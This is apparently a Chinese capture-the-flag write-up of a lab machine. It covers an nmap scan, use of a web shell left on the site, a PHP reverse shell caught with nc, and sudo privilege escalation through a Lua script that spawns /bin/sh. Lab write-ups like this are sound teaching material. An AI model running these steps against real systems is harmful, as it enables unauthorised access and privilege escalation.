扫描主机开放端口
sudo nmap -A 10.10.10.181
扫描结果
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 08:53 EDT
Nmap scan report for 10.10.10.181
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/21%OT=22%CT=1%CU=37726%PV=Y%DS=2%DC=T%G=Y%TM=5EC67A4
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=2%ISR=10E%TI=Z%CI=Z%II=I%TS=C)SEQ
OS:(SP=100%GCD=1%ISR=10E%TI=Z%CI=Z%TS=C)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=
OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 271.21 ms 10.10.14.1
2 271.30 ms 10.10.10.181
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.88 seconds
可以看出目标机器开放了22、80端口
先打开网页看看
查看源码
我们得到一个提示:Some of the best web shells that you might need
Google搜索一下
得到以下webshell,尝试在浏览器中进行访问
最终发现存在smevk.php
查看源码发现账号密码都是admin
登录webshell
发现一个名为php-reverse-shell.php的文件,应该可以反弹shell
将文件中的IP修改为我们自己的IP,端口保持默认
然后访问这个文件,本地使用nc进行监听
访问文件之后得到一个shell
进入/home/webadmin目录下有一个note.txt查看给我们一个提示
查看.bah_history得到lua文件的路径
我们先使用/home/sysadmin/luvit这个工具执行lua脚本,可以再新建一个privesc.lua脚本,然后模仿.bash_history执行命令
echo 'os.execute("/bin/sh")' > privesc.lua
$ ls -la
total 48
drwxr-x--- 5 webadmin sysadmin 4096 May 21 07:15 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 webadmin webadmin 105 Mar 16 04:03 .bash_history
-rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23 2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23 2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24 2019 .local
-rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 May 21 07:08 .ssh
-rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 03:53 note.txt
-rw-rw-rw- 1 webadmin webadmin 22 May 21 07:15 privesc.lua
$ cat privesc.lua
os.execute("/bin/sh")
$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua
sh: turning off NDELAY mode
id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
我们现在将权限提升到了sysadmin
进入sysadmin目录得到flag
获取Root权限??
加入我的星球
下方查看历史文章
扫描二维码
获取更多精彩
NowSec